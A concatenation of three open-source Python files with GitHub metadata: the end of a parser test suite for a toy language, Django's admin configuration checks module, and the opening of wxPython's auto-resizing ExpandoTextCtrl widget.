case1_init, _ = generate_declaration(clean_lex("var a: int = 0"))
case1_init_base = ast.Sequence()
case1_init_base.add(case1_init)
case1.add(case1_init_base)
case1_cond, _ = generate_expression(clean_lex("a < 100"))
case1_iter, _ = generate_sequence(clean_lex("a += 1"))
case1_body = ast.Sequence()
case1_body.add(ast.Sequence())
case1_body.add(case1_iter)
case1_loop = ast.Loop()
case1_loop.add(case1_cond)
case1_loop.add(case1_body)
case1.add(case1_loop)
# case 2: for (a = 0; true; ) {;}, offset 11
case2 = ast.Sequence()
case2_init, _ = generate_assignment(clean_lex("a = 0"))
case2_init_base = ast.Sequence()
case2_init_base.add(case2_init)
case2.add(case2_init_base)
case2_cond, _ = generate_expression(clean_lex("true"))
case2_iter = ast.Sequence()
case2_body = ast.Sequence()
case2_body.add(ast.Sequence())
case2_body.add(case2_iter)
case2_loop = ast.Loop()
case2_loop.add(case2_cond)
case2_loop.add(case2_body)
case2.add(case2_loop)
# case 3: for (; true; ) {;}, 8
case3 = ast.Sequence()
case3_init = ast.Sequence()
case3.add(case3_init)
case3_cond, _ = generate_expression(clean_lex("true"))
case3_body = ast.Sequence()
case3_body.add(ast.Sequence())
case3_body.add(ast.Sequence())
case3_loop = ast.Loop()
case3_loop.add(case3_cond)
case3_loop.add(case3_body)
case3.add(case3_loop)
cases = [
("for (var a: int = 0; a < 100; a += 1) {;}", case1, 19),
("for (a = 0; true; ) {;}", case2, 11),
("for (; true; ) {;}", case3, 8),
]
for tc in cases:
output, offset = generate_for(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("for ; true; a < 100; {;}", ParseException),
("for (true) {;}", ParseException),
("true;", ParseException),
("for {true; ; } (false);", ParseException),
]
for tc in error_cases:
self.assertRaises(tc[1], generate_for, clean_lex(tc[0]))
def test_while(self):
# case 1: while (null) {}
case1 = ast.Loop()
case1.add(ast.Literal(env.Value(env.NULL)))
case1.add(ast.Sequence())
cases = [
("while (null) {}", case1, 5),
("while (null) {;}", case1, 6),
]
for tc in cases:
output, offset = generate_while(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("while () {}", ParseException),
("while ()", ParseException),
("() {}", ParseException),
("while () {}", ParseException),
("while (false) {", ParseException),
("while ) {}}}", ParseException),
]
for tc in error_cases:
self.assertRaises(tc[1], generate_while, clean_lex(tc[0]))
def test_sequence(self):
pass
def test_optimize(self):
pass
def test_generate(self):
pass
| {
"content_hash": "2d3cb37d7f89ac480b7299798f914eec",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 111,
"avg_line_length": 35.60740740740741,
"alnum_prop": 0.5252756396921157,
"repo_name": "lnsp/tea",
"id": "551e8bac6e2bb354f266a1d013ea38e6be1e6fff",
"size": "19232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runtime/test_parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "25"
},
{
"name": "Python",
"bytes": "88546"
},
{
"name": "Shell",
"bytes": "28"
},
{
"name": "Tea",
"bytes": "117"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from itertools import chain
from django.apps import apps
from django.conf import settings
from django.contrib.admin.utils import (
NotRelationField, flatten, get_fields_from_path,
)
from django.core import checks
from django.core.exceptions import FieldDoesNotExist
from django.db import models
from django.forms.models import (
BaseModelForm, BaseModelFormSet, _get_foreign_key,
)
from django.template.engine import Engine
def check_admin_app(**kwargs):
from django.contrib.admin.sites import system_check_errors
return system_check_errors
def check_dependencies(**kwargs):
"""
Check that the admin's dependencies are correctly installed.
"""
errors = []
# contrib.contenttypes must be installed.
if not apps.is_installed('django.contrib.contenttypes'):
missing_app = checks.Error(
"'django.contrib.contenttypes' must be in INSTALLED_APPS in order "
"to use the admin application.",
id="admin.E401",
)
errors.append(missing_app)
# The auth context processor must be installed if using the default
# authentication backend.
try:
default_template_engine = Engine.get_default()
except Exception:
# Skip this non-critical check:
# 1. if the user has a non-trivial TEMPLATES setting and Django
# can't find a default template engine
# 2. if anything goes wrong while loading template engines, in
# order to avoid raising an exception from a confusing location
# Catching ImproperlyConfigured suffices for 1. but 2. requires
# catching all exceptions.
pass
else:
if ('django.contrib.auth.context_processors.auth'
not in default_template_engine.context_processors
and 'django.contrib.auth.backends.ModelBackend'
in settings.AUTHENTICATION_BACKENDS):
missing_template = checks.Error(
"'django.contrib.auth.context_processors.auth' must be in "
"TEMPLATES in order to use the admin application.",
id="admin.E402"
)
errors.append(missing_template)
return errors
class BaseModelAdminChecks(object):
def check(self, admin_obj, **kwargs):
errors = []
errors.extend(self._check_raw_id_fields(admin_obj))
errors.extend(self._check_fields(admin_obj))
errors.extend(self._check_fieldsets(admin_obj))
errors.extend(self._check_exclude(admin_obj))
errors.extend(self._check_form(admin_obj))
errors.extend(self._check_filter_vertical(admin_obj))
errors.extend(self._check_filter_horizontal(admin_obj))
errors.extend(self._check_radio_fields(admin_obj))
errors.extend(self._check_prepopulated_fields(admin_obj))
errors.extend(self._check_view_on_site_url(admin_obj))
errors.extend(self._check_ordering(admin_obj))
errors.extend(self._check_readonly_fields(admin_obj))
return errors
def _check_raw_id_fields(self, obj):
""" Check that `raw_id_fields` only contains field names that are listed
on the model. """
if not isinstance(obj.raw_id_fields, (list, tuple)):
return must_be('a list or tuple', option='raw_id_fields', obj=obj, id='admin.E001')
else:
return list(chain(*[
self._check_raw_id_fields_item(obj, obj.model, field_name, 'raw_id_fields[%d]' % index)
for index, field_name in enumerate(obj.raw_id_fields)
]))
def _check_raw_id_fields_item(self, obj, model, field_name, label):
""" Check an item of `raw_id_fields`, i.e. check that field named
`field_name` exists in model `model` and is a ForeignKey or a
ManyToManyField. """
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E002')
else:
if not isinstance(field, (models.ForeignKey, models.ManyToManyField)):
return must_be('a ForeignKey or ManyToManyField',
option=label, obj=obj, id='admin.E003')
else:
return []
def _check_fields(self, obj):
""" Check that `fields` only refer to existing fields, doesn't contain
duplicates. Check if at most one of `fields` and `fieldsets` is defined.
"""
if obj.fields is None:
return []
elif not isinstance(obj.fields, (list, tuple)):
return must_be('a list or tuple', option='fields', obj=obj, id='admin.E004')
elif obj.fieldsets:
return [
checks.Error(
"Both 'fieldsets' and 'fields' are specified.",
hint=None,
obj=obj.__class__,
id='admin.E005',
)
]
fields = flatten(obj.fields)
if len(fields) != len(set(fields)):
return [
checks.Error(
"The value of 'fields' contains duplicate field(s).",
hint=None,
obj=obj.__class__,
id='admin.E006',
)
]
return list(chain(*[
self._check_field_spec(obj, obj.model, field_name, 'fields')
for field_name in obj.fields
]))
def _check_fieldsets(self, obj):
""" Check that fieldsets is properly formatted and doesn't contain
duplicates. """
if obj.fieldsets is None:
return []
elif not isinstance(obj.fieldsets, (list, tuple)):
return must_be('a list or tuple', option='fieldsets', obj=obj, id='admin.E007')
else:
return list(chain(*[
self._check_fieldsets_item(obj, obj.model, fieldset, 'fieldsets[%d]' % index)
for index, fieldset in enumerate(obj.fieldsets)
]))
def _check_fieldsets_item(self, obj, model, fieldset, label):
""" Check an item of `fieldsets`, i.e. check that this is a pair of a
set name and a dictionary containing "fields" key. """
if not isinstance(fieldset, (list, tuple)):
return must_be('a list or tuple', option=label, obj=obj, id='admin.E008')
elif len(fieldset) != 2:
return must_be('of length 2', option=label, obj=obj, id='admin.E009')
elif not isinstance(fieldset[1], dict):
return must_be('a dictionary', option='%s[1]' % label, obj=obj, id='admin.E010')
elif 'fields' not in fieldset[1]:
return [
checks.Error(
"The value of '%s[1]' must contain the key 'fields'." % label,
hint=None,
obj=obj.__class__,
id='admin.E011',
)
]
elif not isinstance(fieldset[1]['fields'], (list, tuple)):
return must_be('a list or tuple', option="%s[1]['fields']" % label, obj=obj, id='admin.E008')
fields = flatten(fieldset[1]['fields'])
if len(fields) != len(set(fields)):
return [
checks.Error(
"There are duplicate field(s) in '%s[1]'." % label,
hint=None,
obj=obj.__class__,
id='admin.E012',
)
]
return list(chain(*[
self._check_field_spec(obj, model, fieldset_fields, '%s[1]["fields"]' % label)
for fieldset_fields in fieldset[1]['fields']
]))
def _check_field_spec(self, obj, model, fields, label):
""" `fields` should be an item of `fields` or an item of
fieldset[1]['fields'] for any `fieldset` in `fieldsets`. It should be a
field name or a tuple of field names. """
if isinstance(fields, tuple):
return list(chain(*[
self._check_field_spec_item(obj, model, field_name, "%s[%d]" % (label, index))
for index, field_name in enumerate(fields)
]))
else:
return self._check_field_spec_item(obj, model, fields, label)
def _check_field_spec_item(self, obj, model, field_name, label):
if field_name in obj.readonly_fields:
# Stuff can be put in fields that isn't actually a model field if
# it's in readonly_fields, readonly_fields will handle the
# validation of such things.
return []
else:
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
# If we can't find a field on the model that matches, it could
# be an extra field on the form.
return []
else:
if (isinstance(field, models.ManyToManyField) and
not field.remote_field.through._meta.auto_created):
return [
checks.Error(
("The value of '%s' cannot include the ManyToManyField '%s', "
"because that field manually specifies a relationship model.")
% (label, field_name),
hint=None,
obj=obj.__class__,
id='admin.E013',
)
]
else:
return []
def _check_exclude(self, obj):
""" Check that exclude is a sequence without duplicates. """
if obj.exclude is None: # default value is None
return []
elif not isinstance(obj.exclude, (list, tuple)):
return must_be('a list or tuple', option='exclude', obj=obj, id='admin.E014')
elif len(obj.exclude) > len(set(obj.exclude)):
return [
checks.Error(
"The value of 'exclude' contains duplicate field(s).",
hint=None,
obj=obj.__class__,
id='admin.E015',
)
]
else:
return []
def _check_form(self, obj):
""" Check that form subclasses BaseModelForm. """
if hasattr(obj, 'form') and not issubclass(obj.form, BaseModelForm):
return must_inherit_from(parent='BaseModelForm', option='form',
obj=obj, id='admin.E016')
else:
return []
def _check_filter_vertical(self, obj):
""" Check that filter_vertical is a sequence of field names. """
if not hasattr(obj, 'filter_vertical'):
return []
elif not isinstance(obj.filter_vertical, (list, tuple)):
return must_be('a list or tuple', option='filter_vertical', obj=obj, id='admin.E017')
else:
return list(chain(*[
self._check_filter_item(obj, obj.model, field_name, "filter_vertical[%d]" % index)
for index, field_name in enumerate(obj.filter_vertical)
]))
def _check_filter_horizontal(self, obj):
""" Check that filter_horizontal is a sequence of field names. """
if not hasattr(obj, 'filter_horizontal'):
return []
elif not isinstance(obj.filter_horizontal, (list, tuple)):
return must_be('a list or tuple', option='filter_horizontal', obj=obj, id='admin.E018')
else:
return list(chain(*[
self._check_filter_item(obj, obj.model, field_name, "filter_horizontal[%d]" % index)
for index, field_name in enumerate(obj.filter_horizontal)
]))
def _check_filter_item(self, obj, model, field_name, label):
""" Check one item of `filter_vertical` or `filter_horizontal`, i.e.
check that given field exists and is a ManyToManyField. """
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E019')
else:
if not isinstance(field, models.ManyToManyField):
return must_be('a ManyToManyField', option=label, obj=obj, id='admin.E020')
else:
return []
def _check_radio_fields(self, obj):
""" Check that `radio_fields` is a dictionary. """
if not hasattr(obj, 'radio_fields'):
return []
elif not isinstance(obj.radio_fields, dict):
return must_be('a dictionary', option='radio_fields', obj=obj, id='admin.E021')
else:
return list(chain(*[
self._check_radio_fields_key(obj, obj.model, field_name, 'radio_fields') +
self._check_radio_fields_value(obj, val, 'radio_fields["%s"]' % field_name)
for field_name, val in obj.radio_fields.items()
]))
def _check_radio_fields_key(self, obj, model, field_name, label):
""" Check that a key of `radio_fields` dictionary is name of existing
field and that the field is a ForeignKey or has `choices` defined. """
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E022')
else:
if not (isinstance(field, models.ForeignKey) or field.choices):
return [
checks.Error(
"The value of '%s' refers to '%s', which is not an "
"instance of ForeignKey, and does not have a 'choices' definition." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E023',
)
]
else:
return []
def _check_radio_fields_value(self, obj, val, label):
""" Check type of a value of `radio_fields` dictionary. """
from django.contrib.admin.options import HORIZONTAL, VERTICAL
if val not in (HORIZONTAL, VERTICAL):
return [
checks.Error(
"The value of '%s' must be either admin.HORIZONTAL or admin.VERTICAL." % label,
hint=None,
obj=obj.__class__,
id='admin.E024',
)
]
else:
return []
def _check_view_on_site_url(self, obj):
if hasattr(obj, 'view_on_site'):
if not callable(obj.view_on_site) and not isinstance(obj.view_on_site, bool):
return [
checks.Error(
"The value of 'view_on_site' must be a callable or a boolean value.",
hint=None,
obj=obj.__class__,
id='admin.E025',
)
]
else:
return []
else:
return []
def _check_prepopulated_fields(self, obj):
""" Check that `prepopulated_fields` is a dictionary containing allowed
field types. """
if not hasattr(obj, 'prepopulated_fields'):
return []
elif not isinstance(obj.prepopulated_fields, dict):
return must_be('a dictionary', option='prepopulated_fields', obj=obj, id='admin.E026')
else:
return list(chain(*[
self._check_prepopulated_fields_key(obj, obj.model, field_name, 'prepopulated_fields') +
self._check_prepopulated_fields_value(obj, obj.model, val, 'prepopulated_fields["%s"]' % field_name)
for field_name, val in obj.prepopulated_fields.items()
]))
def _check_prepopulated_fields_key(self, obj, model, field_name, label):
""" Check a key of `prepopulated_fields` dictionary, i.e. check that it
is a name of existing field and the field is one of the allowed types.
"""
forbidden_field_types = (
models.DateTimeField,
models.ForeignKey,
models.ManyToManyField
)
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E027')
else:
if isinstance(field, forbidden_field_types):
return [
checks.Error(
"The value of '%s' refers to '%s', which must not be a DateTimeField, "
"ForeignKey or ManyToManyField." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E028',
)
]
else:
return []
def _check_prepopulated_fields_value(self, obj, model, val, label):
""" Check a value of `prepopulated_fields` dictionary, i.e. it's an
iterable of existing fields. """
if not isinstance(val, (list, tuple)):
return must_be('a list or tuple', option=label, obj=obj, id='admin.E029')
else:
return list(chain(*[
self._check_prepopulated_fields_value_item(obj, model, subfield_name, "%s[%r]" % (label, index))
for index, subfield_name in enumerate(val)
]))
def _check_prepopulated_fields_value_item(self, obj, model, field_name, label):
""" For `prepopulated_fields` equal to {"slug": ("title",)},
`field_name` is "title". """
try:
model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E030')
else:
return []
def _check_ordering(self, obj):
""" Check that ordering refers to existing fields or is random. """
# ordering = None
if obj.ordering is None: # The default value is None
return []
elif not isinstance(obj.ordering, (list, tuple)):
return must_be('a list or tuple', option='ordering', obj=obj, id='admin.E031')
else:
return list(chain(*[
self._check_ordering_item(obj, obj.model, field_name, 'ordering[%d]' % index)
for index, field_name in enumerate(obj.ordering)
]))
def _check_ordering_item(self, obj, model, field_name, label):
""" Check that `ordering` refers to existing fields. """
if field_name == '?' and len(obj.ordering) != 1:
return [
checks.Error(
("The value of 'ordering' has the random ordering marker '?', "
"but contains other fields as well."),
hint='Either remove the "?", or remove the other fields.',
obj=obj.__class__,
id='admin.E032',
)
]
elif field_name == '?':
return []
elif '__' in field_name:
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
return []
else:
if field_name.startswith('-'):
field_name = field_name[1:]
try:
model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E033')
else:
return []
def _check_readonly_fields(self, obj):
""" Check that readonly_fields refers to proper attribute or field. """
if obj.readonly_fields == ():
return []
elif not isinstance(obj.readonly_fields, (list, tuple)):
return must_be('a list or tuple', option='readonly_fields', obj=obj, id='admin.E034')
else:
return list(chain(*[
self._check_readonly_fields_item(obj, obj.model, field_name, "readonly_fields[%d]" % index)
for index, field_name in enumerate(obj.readonly_fields)
]))
def _check_readonly_fields_item(self, obj, model, field_name, label):
if callable(field_name):
return []
elif hasattr(obj, field_name):
return []
elif hasattr(model, field_name):
return []
else:
try:
model._meta.get_field(field_name)
except FieldDoesNotExist:
return [
checks.Error(
"The value of '%s' is not a callable, an attribute of '%s', or an attribute of '%s.%s'." % (
label, obj.__class__.__name__, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E035',
)
]
else:
return []
class ModelAdminChecks(BaseModelAdminChecks):
def check(self, admin_obj, **kwargs):
errors = super(ModelAdminChecks, self).check(admin_obj)
errors.extend(self._check_save_as(admin_obj))
errors.extend(self._check_save_on_top(admin_obj))
errors.extend(self._check_inlines(admin_obj))
errors.extend(self._check_list_display(admin_obj))
errors.extend(self._check_list_display_links(admin_obj))
errors.extend(self._check_list_filter(admin_obj))
errors.extend(self._check_list_select_related(admin_obj))
errors.extend(self._check_list_per_page(admin_obj))
errors.extend(self._check_list_max_show_all(admin_obj))
errors.extend(self._check_list_editable(admin_obj))
errors.extend(self._check_search_fields(admin_obj))
errors.extend(self._check_date_hierarchy(admin_obj))
return errors
def _check_save_as(self, obj):
""" Check save_as is a boolean. """
if not isinstance(obj.save_as, bool):
return must_be('a boolean', option='save_as',
obj=obj, id='admin.E101')
else:
return []
def _check_save_on_top(self, obj):
""" Check save_on_top is a boolean. """
if not isinstance(obj.save_on_top, bool):
return must_be('a boolean', option='save_on_top',
obj=obj, id='admin.E102')
else:
return []
def _check_inlines(self, obj):
""" Check all inline model admin classes. """
if not isinstance(obj.inlines, (list, tuple)):
return must_be('a list or tuple', option='inlines', obj=obj, id='admin.E103')
else:
return list(chain(*[
self._check_inlines_item(obj, obj.model, item, "inlines[%d]" % index)
for index, item in enumerate(obj.inlines)
]))
def _check_inlines_item(self, obj, model, inline, label):
""" Check one inline model admin. """
inline_label = '.'.join([inline.__module__, inline.__name__])
from django.contrib.admin.options import BaseModelAdmin
if not issubclass(inline, BaseModelAdmin):
return [
checks.Error(
"'%s' must inherit from 'BaseModelAdmin'." % inline_label,
hint=None,
obj=obj.__class__,
id='admin.E104',
)
]
elif not inline.model:
return [
checks.Error(
"'%s' must have a 'model' attribute." % inline_label,
hint=None,
obj=obj.__class__,
id='admin.E105',
)
]
elif not issubclass(inline.model, models.Model):
return must_be('a Model', option='%s.model' % inline_label,
obj=obj, id='admin.E106')
else:
return inline(model, obj.admin_site).check()
def _check_list_display(self, obj):
""" Check that list_display only contains fields or usable attributes.
"""
if not isinstance(obj.list_display, (list, tuple)):
return must_be('a list or tuple', option='list_display', obj=obj, id='admin.E107')
else:
return list(chain(*[
self._check_list_display_item(obj, obj.model, item, "list_display[%d]" % index)
for index, item in enumerate(obj.list_display)
]))
def _check_list_display_item(self, obj, model, item, label):
if callable(item):
return []
elif hasattr(obj, item):
return []
elif hasattr(model, item):
# getattr(model, item) could be an X_RelatedObjectsDescriptor
try:
field = model._meta.get_field(item)
except FieldDoesNotExist:
try:
field = getattr(model, item)
except AttributeError:
field = None
if field is None:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not a "
"callable, an attribute of '%s', or an attribute or method on '%s.%s'." % (
label, item, obj.__class__.__name__, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E108',
)
]
elif isinstance(field, models.ManyToManyField):
return [
checks.Error(
"The value of '%s' must not be a ManyToManyField." % label,
hint=None,
obj=obj.__class__,
id='admin.E109',
)
]
else:
return []
else:
try:
model._meta.get_field(item)
except FieldDoesNotExist:
return [
# This is a deliberate repeat of E108; there's more than one path
# required to test this condition.
checks.Error(
"The value of '%s' refers to '%s', which is not a callable, "
"an attribute of '%s', or an attribute or method on '%s.%s'." % (
label, item, obj.__class__.__name__, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E108',
)
]
else:
return []
def _check_list_display_links(self, obj):
""" Check that list_display_links is a unique subset of list_display.
"""
if obj.list_display_links is None:
return []
elif not isinstance(obj.list_display_links, (list, tuple)):
return must_be('a list, a tuple, or None', option='list_display_links', obj=obj, id='admin.E110')
else:
return list(chain(*[
self._check_list_display_links_item(obj, field_name, "list_display_links[%d]" % index)
for index, field_name in enumerate(obj.list_display_links)
]))
def _check_list_display_links_item(self, obj, field_name, label):
if field_name not in obj.list_display:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not defined in 'list_display'." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E111',
)
]
else:
return []
def _check_list_filter(self, obj):
if not isinstance(obj.list_filter, (list, tuple)):
return must_be('a list or tuple', option='list_filter', obj=obj, id='admin.E112')
else:
return list(chain(*[
self._check_list_filter_item(obj, obj.model, item, "list_filter[%d]" % index)
for index, item in enumerate(obj.list_filter)
]))
def _check_list_filter_item(self, obj, model, item, label):
"""
Check one item of `list_filter`, i.e. check if it is one of three options:
1. 'field' -- a basic field filter, possibly w/ relationships (e.g.
'field__rel')
2. ('field', SomeFieldListFilter) - a field-based list filter class
3. SomeListFilter - a non-field list filter class
"""
from django.contrib.admin import ListFilter, FieldListFilter
if callable(item) and not isinstance(item, models.Field):
# If item is option 3, it should be a ListFilter...
if not issubclass(item, ListFilter):
return must_inherit_from(parent='ListFilter', option=label,
obj=obj, id='admin.E113')
# ... but not a FieldListFilter.
elif issubclass(item, FieldListFilter):
return [
checks.Error(
"The value of '%s' must not inherit from 'FieldListFilter'." % label,
hint=None,
obj=obj.__class__,
id='admin.E114',
)
]
else:
return []
elif isinstance(item, (tuple, list)):
# item is option #2
field, list_filter_class = item
if not issubclass(list_filter_class, FieldListFilter):
return must_inherit_from(parent='FieldListFilter', option='%s[1]' % label,
obj=obj, id='admin.E115')
else:
return []
else:
# item is option #1
field = item
# Validate the field string
try:
get_fields_from_path(model, field)
except (NotRelationField, FieldDoesNotExist):
return [
checks.Error(
"The value of '%s' refers to '%s', which does not refer to a Field." % (label, field),
hint=None,
obj=obj.__class__,
id='admin.E116',
)
]
else:
return []
def _check_list_select_related(self, obj):
""" Check that list_select_related is a boolean, a list or a tuple. """
if not isinstance(obj.list_select_related, (bool, list, tuple)):
return must_be('a boolean, tuple or list', option='list_select_related',
obj=obj, id='admin.E117')
else:
return []
def _check_list_per_page(self, obj):
""" Check that list_per_page is an integer. """
if not isinstance(obj.list_per_page, int):
return must_be('an integer', option='list_per_page', obj=obj, id='admin.E118')
else:
return []
def _check_list_max_show_all(self, obj):
""" Check that list_max_show_all is an integer. """
if not isinstance(obj.list_max_show_all, int):
return must_be('an integer', option='list_max_show_all', obj=obj, id='admin.E119')
else:
return []
def _check_list_editable(self, obj):
""" Check that list_editable is a sequence of editable fields from
list_display without first element. """
if not isinstance(obj.list_editable, (list, tuple)):
return must_be('a list or tuple', option='list_editable', obj=obj, id='admin.E120')
else:
return list(chain(*[
self._check_list_editable_item(obj, obj.model, item, "list_editable[%d]" % index)
for index, item in enumerate(obj.list_editable)
]))
def _check_list_editable_item(self, obj, model, field_name, label):
try:
field = model._meta.get_field(field_name)
except FieldDoesNotExist:
return refer_to_missing_field(field=field_name, option=label,
model=model, obj=obj, id='admin.E121')
else:
if field_name not in obj.list_display:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not "
"contained in 'list_display'." % (label, field_name),
hint=None,
obj=obj.__class__,
id='admin.E122',
)
]
elif obj.list_display_links and field_name in obj.list_display_links:
return [
checks.Error(
"The value of '%s' cannot be in both 'list_editable' and 'list_display_links'." % field_name,
hint=None,
obj=obj.__class__,
id='admin.E123',
)
]
# Check that list_display_links is set, and that the first values of list_editable and list_display are
# not the same. See ticket #22792 for the use case relating to this.
elif (obj.list_display[0] in obj.list_editable and obj.list_display[0] != obj.list_editable[0] and
obj.list_display_links is not None):
return [
checks.Error(
"The value of '%s' refers to the first field in 'list_display' ('%s'), "
"which cannot be used unless 'list_display_links' is set." % (
label, obj.list_display[0]
),
hint=None,
obj=obj.__class__,
id='admin.E124',
)
]
elif not field.editable:
return [
checks.Error(
"The value of '%s' refers to '%s', which is not editable through the admin." % (
label, field_name
),
hint=None,
obj=obj.__class__,
id='admin.E125',
)
]
else:
return []
def _check_search_fields(self, obj):
""" Check search_fields is a sequence. """
if not isinstance(obj.search_fields, (list, tuple)):
return must_be('a list or tuple', option='search_fields', obj=obj, id='admin.E126')
else:
return []
def _check_date_hierarchy(self, obj):
""" Check that date_hierarchy refers to DateField or DateTimeField. """
if obj.date_hierarchy is None:
return []
else:
try:
field = obj.model._meta.get_field(obj.date_hierarchy)
except FieldDoesNotExist:
return refer_to_missing_field(option='date_hierarchy',
field=obj.date_hierarchy,
model=obj.model, obj=obj, id='admin.E127')
else:
if not isinstance(field, (models.DateField, models.DateTimeField)):
return must_be('a DateField or DateTimeField', option='date_hierarchy',
obj=obj, id='admin.E128')
else:
return []
class InlineModelAdminChecks(BaseModelAdminChecks):
def check(self, inline_obj, **kwargs):
errors = super(InlineModelAdminChecks, self).check(inline_obj)
parent_model = inline_obj.parent_model
errors.extend(self._check_relation(inline_obj, parent_model))
errors.extend(self._check_exclude_of_parent_model(inline_obj, parent_model))
errors.extend(self._check_extra(inline_obj))
errors.extend(self._check_max_num(inline_obj))
errors.extend(self._check_min_num(inline_obj))
errors.extend(self._check_formset(inline_obj))
return errors
def _check_exclude_of_parent_model(self, obj, parent_model):
# Do not perform more specific checks if the base checks result in an
# error.
errors = super(InlineModelAdminChecks, self)._check_exclude(obj)
if errors:
return []
# Skip if `fk_name` is invalid.
if self._check_relation(obj, parent_model):
return []
if obj.exclude is None:
return []
fk = _get_foreign_key(parent_model, obj.model, fk_name=obj.fk_name)
if fk.name in obj.exclude:
return [
checks.Error(
"Cannot exclude the field '%s', because it is the foreign key "
"to the parent model '%s.%s'." % (
fk.name, parent_model._meta.app_label, parent_model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E201',
)
]
else:
return []
def _check_relation(self, obj, parent_model):
try:
_get_foreign_key(parent_model, obj.model, fk_name=obj.fk_name)
except ValueError as e:
return [checks.Error(e.args[0], hint=None, obj=obj.__class__, id='admin.E202')]
else:
return []
def _check_extra(self, obj):
""" Check that extra is an integer. """
if not isinstance(obj.extra, int):
return must_be('an integer', option='extra', obj=obj, id='admin.E203')
else:
return []
def _check_max_num(self, obj):
""" Check that max_num is an integer. """
if obj.max_num is None:
return []
elif not isinstance(obj.max_num, int):
return must_be('an integer', option='max_num', obj=obj, id='admin.E204')
else:
return []
def _check_min_num(self, obj):
""" Check that min_num is an integer. """
if obj.min_num is None:
return []
elif not isinstance(obj.min_num, int):
return must_be('an integer', option='min_num', obj=obj, id='admin.E205')
else:
return []
def _check_formset(self, obj):
""" Check formset is a subclass of BaseModelFormSet. """
if not issubclass(obj.formset, BaseModelFormSet):
return must_inherit_from(parent='BaseModelFormSet', option='formset',
obj=obj, id='admin.E206')
else:
return []
def must_be(type, option, obj, id):
return [
checks.Error(
"The value of '%s' must be %s." % (option, type),
hint=None,
obj=obj.__class__,
id=id,
),
]
def must_inherit_from(parent, option, obj, id):
return [
checks.Error(
"The value of '%s' must inherit from '%s'." % (option, parent),
hint=None,
obj=obj.__class__,
id=id,
),
]
def refer_to_missing_field(field, option, model, obj, id):
return [
checks.Error(
"The value of '%s' refers to '%s', which is not an attribute of '%s.%s'." % (
option, field, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id=id,
),
]
| {
"content_hash": "e30bfe392f15bd0024bb85501bbf1457",
"timestamp": "",
"source": "github",
"line_count": 1015,
"max_line_length": 117,
"avg_line_length": 39.92512315270936,
"alnum_prop": 0.5122396604481295,
"repo_name": "himleyb85/django",
"id": "48539fe9e5935da5a3c33adb563436e2d601a9ec",
"size": "40548",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "django/contrib/admin/checks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52334"
},
{
"name": "HTML",
"bytes": "170527"
},
{
"name": "JavaScript",
"bytes": "256023"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11481044"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
"""
This module contains the `ExpandoTextCtrl` which is a multi-line
text control that will expand its height on the fly to be able to show
all the lines of the content of the control.
"""
import wx
import wx.lib.newevent
# This event class and binder object can be used to catch
# notifications that the ExpandoTextCtrl has resized itself and
# that layout adjustments may need to be made.
wxEVT_ETC_LAYOUT_NEEDED = wx.NewEventType()
EVT_ETC_LAYOUT_NEEDED = wx.PyEventBinder( wxEVT_ETC_LAYOUT_NEEDED, 1 )
#---------------------------------------------------------------------------
class ExpandoTextCtrl(wx.TextCtrl):
"""
The ExpandoTextCtrl is a multi-line wx.TextCtrl that will
adjust its height on the fly as needed to accomodate the number of
lines needed to display the current content of the control. It is
assumed that the width of the control will be a fixed value and
that only the height will be adjusted automatically. If the
control is used in a sizer then the width should be set as part of
the initial or min size of the control.
When the control resizes itself it will attempt to also make
necessary adjustments in the sizer hierarchy it is a member of (if
any) but if that is not suffiecient then the programmer can catch
the EVT_ETC_LAYOUT_NEEDED event in the container and make any
other layout adjustments that may be needed.
"""
_defaultHeight = -1
def __init__(self, parent, id=-1, value="",
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=0, validator=wx.DefaultValidator, name="expando"):
# find the default height of a single line control
self.defaultHeight = self._getDefaultHeight(parent)
# make sure we default to that height if none was given
w, h = size
if h == -1:
h = self.defaultHeight
# always use the multi-line style
